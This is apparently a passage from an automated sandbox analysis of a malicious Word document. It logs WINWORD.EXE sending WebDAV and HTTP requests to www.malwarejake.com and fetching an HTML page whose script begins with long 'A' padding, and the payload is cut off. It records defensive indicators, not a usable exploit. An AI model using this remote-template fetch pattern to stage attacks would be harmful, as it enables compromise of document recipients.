      2022-08-18 06:27:19 UTC1OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 6d 61 6c 77 61 72 65 6a 61 6b 65 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: www.malwarejake.com
      2022-08-18 06:27:19 UTC1INHTTP/1.1 405 Method Not Allowed
      Date: Thu, 18 Aug 2022 06:27:19 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 311
      Connection: close
      Content-Type: text/html; charset=iso-8859-1
      2022-08-18 06:27:19 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server a


      Session IDSource IPSource PortDestination IPDestination PortProcess
      4192.168.2.2249182143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:20 UTC1OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 6d 61 6c 77 61 72 65 6a 61 6b 65 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: www.malwarejake.com
      2022-08-18 06:27:21 UTC1INHTTP/1.1 405 Method Not Allowed
      Date: Thu, 18 Aug 2022 06:27:21 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 311
      Connection: close
      Content-Type: text/html; charset=iso-8859-1
      2022-08-18 06:27:21 UTC2INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server a


      Session IDSource IPSource PortDestination IPDestination PortProcess
      5192.168.2.2249183143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:21 UTC2OUTGET /456.html HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      Host: www.malwarejake.com
      Connection: Keep-Alive
      2022-08-18 06:27:22 UTC2INHTTP/1.1 200 OK
      Date: Thu, 18 Aug 2022 06:27:21 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
      ETag: "1b90-5e045198f8aaa"
      Accept-Ranges: bytes
      Content-Length: 7056
      Vary: Accept-Encoding
      Connection: close
      Content-Type: text/html
      2022-08-18 06:27:22 UTC2INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
      Data Ascii: <!doctype html><html lang="en"><body><script>//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


      Session IDSource IPSource PortDestination IPDestination PortProcess
      6192.168.2.2249184143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:22 UTC9OUTHEAD /456.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: www.malwarejake.com
      Content-Length: 0
      Connection: Keep-Alive
      2022-08-18 06:27:22 UTC10INHTTP/1.1 200 OK
      Date: Thu, 18 Aug 2022 06:27:22 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
      ETag: "1b90-5e045198f8aaa"
      Accept-Ranges: bytes
      Content-Length: 7056
      Vary: Accept-Encoding
      Connection: close
      Content-Type: text/html


      Session IDSource IPSource PortDestination IPDestination PortProcess
      7192.168.2.2249185143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:23 UTC10OUTHEAD /456.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: www.malwarejake.com
      Content-Length: 0
      Connection: Keep-Alive
      2022-08-18 06:27:23 UTC10INHTTP/1.1 200 OK
      Date: Thu, 18 Aug 2022 06:27:23 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
      ETag: "1b90-5e045198f8aaa"
      Accept-Ranges: bytes
      Content-Length: 7056
      Vary: Accept-Encoding
      Connection: close
      Content-Type: text/html


      Session IDSource IPSource PortDestination IPDestination PortProcess
      8192.168.2.2249186143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:24 UTC10OUTHEAD /456.html HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Microsoft Office Existence Discovery
      Host: www.malwarejake.com
      2022-08-18 06:27:24 UTC10INHTTP/1.1 200 OK
      Date: Thu, 18 Aug 2022 06:27:24 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
      ETag: "1b90-5e045198f8aaa"
      Accept-Ranges: bytes
      Content-Length: 7056
      Vary: Accept-Encoding
      Connection: close
      Content-Type: text/html


      Session IDSource IPSource PortDestination IPDestination PortProcess
      9192.168.2.2249187143.198.109.79443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-08-18 06:27:26 UTC11OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 6d 61 6c 77 61 72 65 6a 61 6b 65 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: www.malwarejake.com
      2022-08-18 06:27:26 UTC11INHTTP/1.1 405 Method Not Allowed
      Date: Thu, 18 Aug 2022 06:27:26 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 311
      Connection: close
      Content-Type: text/html; charset=iso-8859-1
      2022-08-18 06:27:26 UTC11INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server a


      Statistics

      No statistics

      System Behavior

      General

      Target ID:0
      Start time:08:26:20
      Start date:18/08/2022
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x13f5c0000
      File size:1423704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Disassembly

      No disassembly